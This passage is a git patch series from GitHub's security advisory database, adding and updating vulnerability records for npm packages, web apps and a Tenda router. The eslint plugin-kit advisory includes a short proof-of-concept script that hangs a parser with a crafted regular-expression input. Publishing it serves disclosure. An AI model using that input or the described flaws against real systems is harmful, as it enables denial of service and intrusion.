Subject: [PATCH 021/323] Publish GHSA-xffm-g5w8-qvg7 --- .../GHSA-xffm-g5w8-qvg7.json | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-xffm-g5w8-qvg7/GHSA-xffm-g5w8-qvg7.json diff --git a/advisories/github-reviewed/2025/07/GHSA-xffm-g5w8-qvg7/GHSA-xffm-g5w8-qvg7.json b/advisories/github-reviewed/2025/07/GHSA-xffm-g5w8-qvg7/GHSA-xffm-g5w8-qvg7.json new file mode 100644 index 0000000000000..fc94b00b2542a --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-xffm-g5w8-qvg7/GHSA-xffm-g5w8-qvg7.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xffm-g5w8-qvg7", + "modified": "2025-07-18T20:39:12Z", + "published": "2025-07-18T20:39:12Z", + "aliases": [], + "summary": "@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser", + "details": "### Summary\n\nThe `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.\n\n### Details\n\nThe regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`.\n\n### PoC\n\n```javascript\nconst { ConfigCommentParser } = require(\"@eslint/plugin-kit\");\n\nconst str = `${\"A\".repeat(1000000)}?: 1 B: 2`;\n\nconsole.log(\"start\")\nvar parser = new ConfigCommentParser();\nconsole.log(parser.parseJSONLikeConfig(str));\nconsole.log(\"end\")\n\n// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`\n// then the program will stuck forever with high CPU usage\n```\n\n### Impact\n\nThis is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@eslint/plugin-kit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.3.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/eslint/rewrite/security/advisories/GHSA-xffm-g5w8-qvg7" + }, + { + "type": "WEB", + "url": "https://github.com/eslint/rewrite/commit/b283f64099ad6c6b5043387c091691d21b387805" + }, + { + "type": "PACKAGE", + "url": "https://github.com/eslint/rewrite" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T20:39:12Z", + "nvd_published_at": null + } +} \ No newline at end of file From 0271e7d863e42559d34943c61667521e8af6460d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 21:32:32 +0000 Subject: [PATCH 022/323] Advisory Database Sync --- .../GHSA-m74w-gj86-32q9.json | 3 +- .../GHSA-255h-29g9-9gqp.json | 48 ++++++++++++++ .../GHSA-27q6-c3vc-27q9.json | 37 +++++++++++ .../GHSA-2ghx-mx8m-8w49.json | 15 +++-- .../GHSA-2hh4-c6pj-8p6j.json | 15 +++-- .../GHSA-2w53-3qhg-wqq3.json | 40 ++++++++++++ .../GHSA-3m4m-v7p2-vg4g.json | 11 +++- .../GHSA-488q-cf9g-9qqc.json | 48 ++++++++++++++ .../GHSA-7h6c-r5x6-jgc8.json | 15 +++-- .../GHSA-7xgc-mhcx-f3p4.json | 64 +++++++++++++++++++ .../GHSA-85f8-38hh-c6gj.json | 15 +++-- .../GHSA-8m7g-pwgr-8x7c.json | 37 +++++++++++ .../GHSA-8m7m-95f5-vqg9.json | 60 +++++++++++++++++ .../GHSA-92hh-vh5p-5x9f.json | 37 +++++++++++ .../GHSA-ch4c-h46j-p5r9.json | 3 +- .../GHSA-f272-f7h4-54qg.json | 52 +++++++++++++++ .../GHSA-f5hc-g46g-fv5f.json | 3 +- .../GHSA-gw6j-gjcx-2747.json | 37 +++++++++++ .../GHSA-h568-mfp5-v835.json | 44 +++++++++++++ .../GHSA-h65x-jjv9-8c48.json | 64 +++++++++++++++++++ .../GHSA-hrfv-4245-jm2h.json | 40 ++++++++++++ .../GHSA-j9wg-hp22-g525.json | 37 +++++++++++ .../GHSA-mhfx-j9x5-v427.json | 15 +++-- .../GHSA-pr3f-84fh-7r83.json | 36 +++++++++++ .../GHSA-pr48-hfmc-f9vq.json | 15 +++-- .../GHSA-q3r2-78g7-7mh4.json | 3 +- .../GHSA-qfm9-m9jj-jr8j.json | 52 +++++++++++++++ .../GHSA-qmr8-m22m-86vv.json | 56 ++++++++++++++++ .../GHSA-r7q6-6fmq-mx4c.json | 15 +++-- .../GHSA-rh5q-v9ww-rqgm.json | 36 +++++++++++ .../GHSA-rmmj-8q9v-qxh2.json | 15 +++-- .../GHSA-v33m-2fqw-vhxg.json | 3 +- .../GHSA-vv2c-jqcc-c7hq.json | 29 +++++++++ 33 files changed, 960 insertions(+), 40 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-255h-29g9-9gqp/GHSA-255h-29g9-9gqp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-27q6-c3vc-27q9/GHSA-27q6-c3vc-27q9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2w53-3qhg-wqq3/GHSA-2w53-3qhg-wqq3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-488q-cf9g-9qqc/GHSA-488q-cf9g-9qqc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7xgc-mhcx-f3p4/GHSA-7xgc-mhcx-f3p4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8m7g-pwgr-8x7c/GHSA-8m7g-pwgr-8x7c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8m7m-95f5-vqg9/GHSA-8m7m-95f5-vqg9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-92hh-vh5p-5x9f/GHSA-92hh-vh5p-5x9f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f272-f7h4-54qg/GHSA-f272-f7h4-54qg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gw6j-gjcx-2747/GHSA-gw6j-gjcx-2747.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h568-mfp5-v835/GHSA-h568-mfp5-v835.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h65x-jjv9-8c48/GHSA-h65x-jjv9-8c48.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hrfv-4245-jm2h/GHSA-hrfv-4245-jm2h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j9wg-hp22-g525/GHSA-j9wg-hp22-g525.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qfm9-m9jj-jr8j/GHSA-qfm9-m9jj-jr8j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qmr8-m22m-86vv/GHSA-qmr8-m22m-86vv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vv2c-jqcc-c7hq/GHSA-vv2c-jqcc-c7hq.json diff --git a/advisories/unreviewed/2025/03/GHSA-m74w-gj86-32q9/GHSA-m74w-gj86-32q9.json b/advisories/unreviewed/2025/03/GHSA-m74w-gj86-32q9/GHSA-m74w-gj86-32q9.json index 43654f25682a8..397fdf227ec95 100644 --- a/advisories/unreviewed/2025/03/GHSA-m74w-gj86-32q9/GHSA-m74w-gj86-32q9.json +++ b/advisories/unreviewed/2025/03/GHSA-m74w-gj86-32q9/GHSA-m74w-gj86-32q9.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-304" + "CWE-304", + "CWE-639" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-255h-29g9-9gqp/GHSA-255h-29g9-9gqp.json b/advisories/unreviewed/2025/07/GHSA-255h-29g9-9gqp/GHSA-255h-29g9-9gqp.json new file mode 100644 index 0000000000000..99fb66f80500d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-255h-29g9-9gqp/GHSA-255h-29g9-9gqp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-255h-29g9-9gqp", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-7803" + ], + "details": "A vulnerability was found in descreekert wx-discuz up to 12bd4745c63ec203cb32119bf77ead4a923bf277. It has been classified as problematic. This affects the function validToken of the file /wx.php. The manipulation of the argument echostr leads to cross site scripting. It is possible to initiate the attack remotely. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7803" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316869" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316869" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616885" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T20:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-27q6-c3vc-27q9/GHSA-27q6-c3vc-27q9.json b/advisories/unreviewed/2025/07/GHSA-27q6-c3vc-27q9/GHSA-27q6-c3vc-27q9.json new file mode 100644 index 0000000000000..9b17f921347a0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-27q6-c3vc-27q9/GHSA-27q6-c3vc-27q9.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27q6-c3vc-27q9", + "modified": "2025-07-18T21:30:31Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-50583" + ], + "details": "StudentManage v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Add A New Student module.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50583" + }, + { + "type": "WEB", + "url": "https://github.com/SimonKang949/Vulnerabilities/issues/4" + }, + { + "type": "WEB", + "url": "https://gitee.com/DayCloud/student-manage" + }, + { + "type": "WEB", + "url": "http://studentmanage.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T21:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json b/advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json index ab3b10e0a7be6..df61d203d768d 100644 --- a/advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json +++ b/advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2ghx-mx8m-8w49", - "modified": "2025-07-18T18:30:29Z", + "modified": "2025-07-18T21:30:28Z", "published": "2025-07-18T18:30:29Z", "aliases": [ "CVE-2025-50586" ], "details": "StudentManage v1.0 was discovered to contain Cross-Site Request Forgery (CSRF).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T17:15:44Z" diff --git a/advisories/unreviewed/2025/07/GHSA-2hh4-c6pj-8p6j/GHSA-2hh4-c6pj-8p6j.json b/advisories/unreviewed/2025/07/GHSA-2hh4-c6pj-8p6j/GHSA-2hh4-c6pj-8p6j.json index e6a82ca05b9bb..e6b1a77de8056 100644 --- a/advisories/unreviewed/2025/07/GHSA-2hh4-c6pj-8p6j/GHSA-2hh4-c6pj-8p6j.json +++ b/advisories/unreviewed/2025/07/GHSA-2hh4-c6pj-8p6j/GHSA-2hh4-c6pj-8p6j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2hh4-c6pj-8p6j", - "modified": "2025-07-18T15:31:57Z", + "modified": "2025-07-18T21:30:28Z", "published": "2025-07-18T15:31:57Z", "aliases": [ "CVE-2025-46000" ], "details": "An arbitrary file upload vulnerability in the component /rsc/filemanager.rsc.class.php of Filemanager commit c75b914 v.2.5.0 allows attackers to execute arbitrary code via uploading a crafted SVG file.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-94" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T15:15:27Z" diff --git a/advisories/unreviewed/2025/07/GHSA-2w53-3qhg-wqq3/GHSA-2w53-3qhg-wqq3.json b/advisories/unreviewed/2025/07/GHSA-2w53-3qhg-wqq3/GHSA-2w53-3qhg-wqq3.json new file mode 100644 index 0000000000000..feb1e19542f82 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2w53-3qhg-wqq3/GHSA-2w53-3qhg-wqq3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2w53-3qhg-wqq3", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-52163" + ], + "details": "A Server-Side Request Forgery (SSRF) in the component TunnelServlet of agorum Software GmbH Agorum core open v11.9.2 & v11.10.1 allows attackers to forcefully initiate connections to arbitrary internal and external resources via a crafted request. This can lead to sensitive data exposure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52163" + }, + { + "type": "WEB", + "url": "https://herolab.usd.de/security-advisories/usd-2025-0025" + }, + { + "type": "WEB", + "url": "http://agorum.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json b/advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json index efa6a52779e03..c98081a22d5fc 100644 --- a/advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json +++ b/advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3m4m-v7p2-vg4g", - "modified": "2025-07-18T18:30:29Z", + "modified": "2025-07-18T21:30:28Z", "published": "2025-07-18T18:30:29Z", "aliases": [ "CVE-2025-45156" ], "details": "Splashin iOS v2.0 fails to enforce server-side interval restrictions for location updates for free-tier users.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T17:15:29Z" diff --git a/advisories/unreviewed/2025/07/GHSA-488q-cf9g-9qqc/GHSA-488q-cf9g-9qqc.json b/advisories/unreviewed/2025/07/GHSA-488q-cf9g-9qqc/GHSA-488q-cf9g-9qqc.json new file mode 100644 index 0000000000000..158662f83928a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-488q-cf9g-9qqc/GHSA-488q-cf9g-9qqc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-488q-cf9g-9qqc", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-7800" + ], + "details": "A vulnerability classified as problematic was found in cgpandey hotelmis up to c572198e6c4780fccc63b1d3e8f3f72f825fc94e. This vulnerability affects unknown code of the file admin.php of the component HTTP GET Request Handler. The manipulation of the argument Search leads to cross site scripting. The attack can be initiated remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7800" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316864" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316864" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616838" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json b/advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json index a5def3780f21c..db0172608fba6 100644 --- a/advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json +++ b/advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7h6c-r5x6-jgc8", - "modified": "2025-07-18T18:30:30Z", + "modified": "2025-07-18T21:30:28Z", "published": "2025-07-18T18:30:29Z", "aliases": [ "CVE-2025-52162" ], "details": "agorum Software GmbH Agorum core open v11.9.2 & v11.10.1 was discovered to contain an XML External Entity (XXE) via the RSSReader endpoint. This vulnerability allows attackers to access sensitive data via providing a crafted XML input.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T17:15:44Z" diff --git a/advisories/unreviewed/2025/07/GHSA-7xgc-mhcx-f3p4/GHSA-7xgc-mhcx-f3p4.json b/advisories/unreviewed/2025/07/GHSA-7xgc-mhcx-f3p4/GHSA-7xgc-mhcx-f3p4.json new file mode 100644 index 0000000000000..3851df9c4598d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7xgc-mhcx-f3p4/GHSA-7xgc-mhcx-f3p4.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xgc-mhcx-f3p4", + "modified": "2025-07-18T21:30:31Z", + "published": "2025-07-18T21:30:31Z", + "aliases": [ + "CVE-2025-7807" + ], + "details": "A vulnerability, which was classified as critical, has been found in Tenda FH451 1.0.0.9. This issue affects the function fromSafeUrlFilter of the file /goform/SafeUrlFilter. The manipulation of the argument Go/page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7807" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromSafeUrlFilter_Go.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromSafeUrlFilter_page.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316883" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316883" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616350" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616352" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T21:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json b/advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json index 8b14a276d7f44..c1827d0e0ff0c 100644 --- a/advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json +++ b/advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-85f8-38hh-c6gj", - "modified": "2025-07-18T18:30:30Z", + "modified": "2025-07-18T21:30:29Z", "published": "2025-07-18T18:30:30Z", "aliases": [ "CVE-2025-52164" ], "details": "Software GmbH Agorum core open v11.9.2 & v11.10.1 was discovered to store credentials in plaintext.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-256" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T18:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-8m7g-pwgr-8x7c/GHSA-8m7g-pwgr-8x7c.json b/advisories/unreviewed/2025/07/GHSA-8m7g-pwgr-8x7c/GHSA-8m7g-pwgr-8x7c.json new file mode 100644 index 0000000000000..61dcd15deb945 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8m7g-pwgr-8x7c/GHSA-8m7g-pwgr-8x7c.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8m7g-pwgr-8x7c", + "modified": "2025-07-18T21:30:31Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-50582" + ], + "details": "StudentManage v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Add A New Course module.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50582" + }, + { + "type": "WEB", + "url": "https://github.com/SimonKang949/Vulnerabilities/issues/5" + }, + { + "type": "WEB", + "url": "https://gitee.com/DayCloud/student-manage" + }, + { + "type": "WEB", + "url": "http://studentmanage.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T21:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8m7m-95f5-vqg9/GHSA-8m7m-95f5-vqg9.json b/advisories/unreviewed/2025/07/GHSA-8m7m-95f5-vqg9/GHSA-8m7m-95f5-vqg9.json new file mode 100644 index 0000000000000..4b38404ca8892 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8m7m-95f5-vqg9/GHSA-8m7m-95f5-vqg9.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8m7m-95f5-vqg9", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-7805" + ], + "details": "A vulnerability classified as critical has been found in Tenda FH451 1.0.0.9. This affects the function fromPptpUserSetting of the file /goform/PPTPUserSetting. The manipulation of the argument delno leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7805" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromPptpUserSetting.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromPptpUserSetting.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316881" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316881" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616347" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T20:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-92hh-vh5p-5x9f/GHSA-92hh-vh5p-5x9f.json b/advisories/unreviewed/2025/07/GHSA-92hh-vh5p-5x9f/GHSA-92hh-vh5p-5x9f.json new file mode 100644 index 0000000000000..a89c9bd8a0a4a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-92hh-vh5p-5x9f/GHSA-92hh-vh5p-5x9f.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92hh-vh5p-5x9f", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-50584" + ], + "details": "StudentManage v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Add A New Teacher module.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50584" + }, + { + "type": "WEB", + "url": "https://github.com/SimonKang949/Vulnerabilities/issues/3" + }, + { + "type": "WEB", + "url": "https://gitee.com/DayCloud/student-manage" + }, + { + "type": "WEB", + "url": "http://studentmanage.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T20:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ch4c-h46j-p5r9/GHSA-ch4c-h46j-p5r9.json b/advisories/unreviewed/2025/07/GHSA-ch4c-h46j-p5r9/GHSA-ch4c-h46j-p5r9.json index 3e9200f708dfe..d796785dbe0ca 100644 --- a/advisories/unreviewed/2025/07/GHSA-ch4c-h46j-p5r9/GHSA-ch4c-h46j-p5r9.json +++ b/advisories/unreviewed/2025/07/GHSA-ch4c-h46j-p5r9/GHSA-ch4c-h46j-p5r9.json @@ -46,7 +46,8 @@ ], 